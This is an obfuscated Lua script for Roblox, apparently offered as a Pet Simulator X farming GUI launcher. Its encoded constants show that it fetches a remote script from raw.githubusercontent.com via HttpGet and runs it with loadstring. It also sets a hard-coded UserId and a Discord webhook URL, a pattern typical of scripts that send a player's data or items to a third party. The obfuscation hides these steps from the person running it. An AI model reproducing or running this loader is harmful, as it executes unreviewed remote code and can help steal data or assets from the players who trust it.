--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v91=v5(v84,v19);v19=nil;return v91;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%1) ;else local v86=2^(v32-(932 -(215 + 642 + 74))) ;return (((v31%(v86 + v86))>=v86) and (569 -(58 + 309 + 201))) or (927 -(214 + 713)) ;end end local function v21()local v34=877 -(282 + 595) ;local v35;while true do if (v34==(1638 -(1523 + 114))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;return (v37 * (251 + 5)) + v36 ;end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * 16777216) + (v41 * (66493 -(892 + 65))) + (v40 * (610 -354)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + ((3 + 1) -1) );v18=v18 + ((868 -514) -(87 + 263)) ;v38=181 -(67 + 113) ;end end end local function v24()local v43=v23();local v44=v23();local v45=(19 -(10 + 8)) + 0 ;local v46=(v20(v44,3 -2 ,20) * ((954 -(802 + (577 -427)))^32)) + v43 ;local v47=v20(v44,56 -(477 -(416 + 26)) ,55 -24 );local v48=((v20(v44,24 + 8 )==(998 -(915 + 82))) and  -1) or 1 ;if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else local v92=0;while true do if (v92==(0 -0)) then v47=(510 + 678) -(1069 + 118) ;v45=(0 -0) -0 ;break;end end end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + (446 -(145 + 293))) ) * (v45 + (v46/((793 -(368 + (853 -(44 + 386))))^((1649 -(998 + 488)) -111)))) ;end local function v25(v49)local v50;if  not v49 then local v87=(0 -0) + 0 ;while true do if (v87==(0 + 0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(773 -(201 + 571)) );v18=v18 + v49 ;local v51={};for v67=1139 -(116 + 1022) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1793 -(1563 + 230) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((289 -(134 + 151))~=v52) then else while true do if (v53==1) then local v97=1665 -(970 + 695) ;while true do if ((0 -0)==v97) then v56=nil;v57=nil;v97=1;end if (v97==(1991 -(582 + 1408))) then v53=2;break;end end end if (v53==2) then local v98=0;while true do if (v98==1) then v53=10 -7 ;break;end if (v98~=0) then else v58=nil;v59=nil;v98=1;end end end if (v53==(0 -0)) then v54=0;v55=nil;v53=1;end if (v53==3) then v60=nil;while true do local v99=0;local v100;while true do if (v99~=0) then else v100=0;while true do if (v100==0) then local v145=0 -0 ;while true do if (v145==1) then v100=1825 -(1195 + 629) ;break;end if (v145==(0 -0)) then if (v54~=(241 -(187 + 54))) then else local v158=780 -(162 + 618) ;local v159;while true do if (v158~=(0 + 0)) then else v159=0 + 0 ;while true do if (1==v159) then v57={};v54=1 -0 ;break;end if (v159==(0 -0)) then local v172=0;while true do if (v172~=1) then else v159=1;break;end if (v172==(0 + 0)) then v55={};v56={};v172=1;end end end end break;end end end if ((1637 -(1373 + 263))==v54) then local v160=0;local v161;while true do if (v160~=(1000 -(451 + 549))) then else v161=0;while true do if (v161~=(0 + 0)) then else local v173=0;local v174;while true do if (v173==0) then v174=0 -0 ;while true do if ((1 -0)~=v174) then else v161=1;break;end if (v174==0) then local v181=0;while true do if (0~=v181) then else v58={v55,v56,nil,v57};v59=v23();v181=1;end if (v181~=(1 + 0)) then else v174=1 -0 ;break;end end end end break;end end end if (v161~=1) then else v60={};v54=343 -(218 + 123) ;break;end end break;end end end v145=1582 -(1535 + 46) ;end end end if (v100~=1) then else if (v54==(2 + 0)) then local v152=0 + 0 ;local v153;while true do if (v152==0) then v153=0;while true do if (v153==(560 -(306 + 254))) then local v166=0;local v167;while true do if (v166==0) then v167=0 + 0 ;while true do if (v167==(0 -0)) then for v176=1468 -(899 + 568) ,v59 do local v177=0 + 0 ;local v178;local v179;local v180;while true do if (v177==(0 -0)) then v178=603 -(268 + 335) ;v179=nil;v177=1;end if (v177==(291 -(60 + 230))) then v180=nil;while true do if (v178==1) then if (v179==1) then v180=v21()~=(572 -(426 + 146)) ;elseif (v179==2) then v180=v24();elseif (v179==3) then v180=v25();end v60[v176]=v180;break;end if (v178==0) then v179=v21();v180=nil;v178=1 + 0 ;end end break;end end end v58[1459 -(282 + 1174) ]=v21();v167=1;end if (v167~=1) then else v153=1;break;end end break;end end end if (1==v153) then for v168=812 -(569 + 242) ,v23() do local v169=0 -0 ;local v170;local v171;while true do if (v169==1) then while true do if (v170==(0 + 0)) then v171=v21();if (v20(v171,1,1)==0) then local v182=1024 -(706 + 318) ;local v183;local v184;local v185;local v186;local v187;while true do if (v182~=1) then else v185=nil;v186=nil;v182=2;end if (v182==(1251 -(721 + 530))) then v183=0;v184=nil;v182=1;end if (v182==2) then v187=nil;while true do if (v183~=(1271 -(945 + 326))) then else local v189=0 -0 ;while true do if (v189~=0) then else v184=0 + 0 ;v185=nil;v189=701 -(271 + 429) ;end if (v189~=(1 + 0)) then else v183=1501 -(1408 + 92) ;break;end end end if (v183==1) then local v190=1086 -(461 + 625) ;while true do if ((1288 -(993 + 295))~=v190) then else v186=nil;v187=nil;v190=1 + 0 ;end if (v190==(1172 -(418 + 753))) then v183=1 + 1 ;break;end end end if (v183==(1 + 1)) then while true do if (v184~=(0 + 0)) then else local v191=0 + 0 ;while true do if (v191~=(529 -(406 + 123))) then else v185=v20(v171,1771 -(1749 + 20) ,3);v186=v20(v171,1 + 3 ,1328 -(1249 + 73) );v191=1 + 0 ;end if (v191~=(1146 -(466 + 679))) then else v184=1;break;end end end if (v184==(6 -3)) then if (v20(v186,8 -5 ,1903 -(106 + 1794) )~=1) then else v187[2 + 2 ]=v60[v187[2 + 2 ]];end v55[v168]=v187;break;end if (v184==1) then local v193=0;while true do if (v193~=(2 -1)) then else v184=5 -3 ;break;end if (v193==(114 -(4 + 110))) then v187={v22(),v22(),nil,nil};if (v185==0) then local v198=0 + 0 ;local v199;local v200;while true do if (v198~=0) then else v199=0;v200=nil;v198=1 -0 ;end if (v198~=1) then else while true do if (v199~=(0 -0)) then else v200=0;while true do if (v200==0) then v187[169 -(122 + 44) ]=v22();v187[6 -2 ]=v22();break;end end break;end end break;end end elseif (v185==(3 -2)) then v187[3 + 0 ]=v23();elseif (v185==2) then v187[1 + 2 ]=v23() -((3 -1)^16) ;elseif (v185~=(68 -(30 + 35))) then else local v207=0;local v208;local v209;while true do if ((1 + 0)==v207) then while true do if (v208==0) then v209=1257 -(1043 + 214) ;while true do if (0==v209) then v187[3]=v23() -((7 -5)^16) ;v187[1216 -(323 + 889) ]=v22();break;end end break;end end break;end if (v207~=0) then else v208=0 -0 ;v209=nil;v207=581 -(361 + 219) ;end end end v193=1;end end end if (v184~=2) then else local v194=0;while true do if (v194==(321 -(53 + 267))) then v184=1 + 2 ;break;end if (v194==(413 -(15 + 398))) then local v197=982 -(18 + 964) ;while true do if (v197==1) then v194=1;break;end if (v197==(0 -0)) then if (v20(v186,1,1)~=1) then else v187[2 + 0 ]=v60[v187[2]];end if (v20(v186,2 + 0 ,2)==1) then v187[853 -(20 + 830) ]=v60[v187[3 + 0 ]];end v197=127 -(116 + 10) ;end end end end end end break;end end break;end end end break;end end break;end if (v169==(0 + 0)) then v170=0;v171=nil;v169=739 -(542 + 196) ;end end end v54=3;break;end end break;end end end if (3==v54) then local v154=0 -0 ;while true do if (0==v154) then for v162=1,v23() do v56[v162-1 ]=v28();end return v58;end end end break;end end break;end end end break;end end break;end if (v52==0) then v53=0 + 0 ;v54=nil;v52=1 + 0 ;end if (v52==(1 + 1)) then v57=nil;v58=nil;v52=7 -4 ;end if (v52==(7 -4)) then v59=nil;v60=nil;v52=4;end if (v52==(1552 -(1126 + 425))) then v55=nil;v56=nil;v52=2;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=11) then if (v82<=5) then if (v82<=2) then if (v82<=0) then v79[v81[2]][v81[3]]=v81[4];elseif (v82==1) then v63[v81[3]]=v79[v81[2]];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=3) then local v103=0;local v104;local v105;local v106;local v107;while true do if (v103==1) then v74=(v106 + v104) -1 ;v107=0;v103=2;end if (2==v103) then for v147=v104,v74 do v107=v107 + 1 ;v79[v147]=v105[v107];end break;end if (v103==0) then v104=v81[2];v105,v106=v72(v79[v104](v13(v79,v104 + 1 ,v81[3])));v103=1;end end elseif (v82==4) then v79[v81[2]]=v81[3]~=0 ;else v79[v81[2]]=v63[v81[3]];end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]=v81[3]~=0 ;elseif (v82==7) then local v127=v81[2];local v128=v79[v81[3]];v79[v127 + 1 ]=v128;v79[v127]=v128[v81[4]];else v73=v81[3];end elseif (v82<=9) then local v109=v81[2];v79[v109]=v79[v109](v13(v79,v109 + 1 ,v74));elseif (v82>10) then v73=v81[3];else local v134=0;local v135;local v136;local v137;local v138;while true do if (v134==0) then v135=v81[2];v136,v137=v72(v79[v135](v13(v79,v135 + 1 ,v81[3])));v134=1;end if (v134==1) then v74=(v137 + v135) -1 ;v138=0;v134=2;end if (v134==2) then for v156=v135,v74 do local v157=0;while true do if (v157==0) then v138=v138 + 1 ;v79[v156]=v136[v138];break;end end end break;end end end elseif (v82<=17) then if (v82<=14) then if (v82<=12) then do return;end elseif (v82>13) then v79[v81[2]]();elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=15) then v63[v81[3]]=v79[v81[2]];elseif (v82>16) then v79[v81[2]]();else v79[v81[2]]=v81[3];end elseif (v82<=20) then if (v82<=18) then v79[v81[2]][v81[3]]=v81[4];elseif (v82>19) then local v141=v81[2];v79[v141]=v79[v141](v13(v79,v141 + 1 ,v74));else do return;end end elseif (v82<=21) then local v115=v81[2];local v116=v79[v81[3]];v79[v115 + 1 ]=v116;v79[v115]=v116[v81[4]];elseif (v82==22) then v79[v81[2]]=v81[3];elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574035B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F53637269707468756270657473696D782F70657473696D786C61756E636865722F6D61696E2F426F7265646875626661726D6775692E6C756103063O00557365724964030A3O002O31382O30333935303603073O00576562482O6F6B2O033O0044697303793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31332O3731352O32363238392O31353230372F6F53505A724733575A634D3779616C3459365559746F64442D59315134794D42726757546E414647667A4C5962506743797467796E694831766A39707864656336726F6400153O0012163O00013O00260D3O000C000100020004083O000C0001001202000100033O001202000200043O002007000200020005001216000400064O0004000500014O0003000200054O001400013O00022O000E0001000100010004083O0014000100260D3O0001000100010004083O00010001001216000100083O00120F000100073O001202000100093O00302O0001000A000B0012163O00023O0004083O000100012O00133O00017O00",v9(),...);
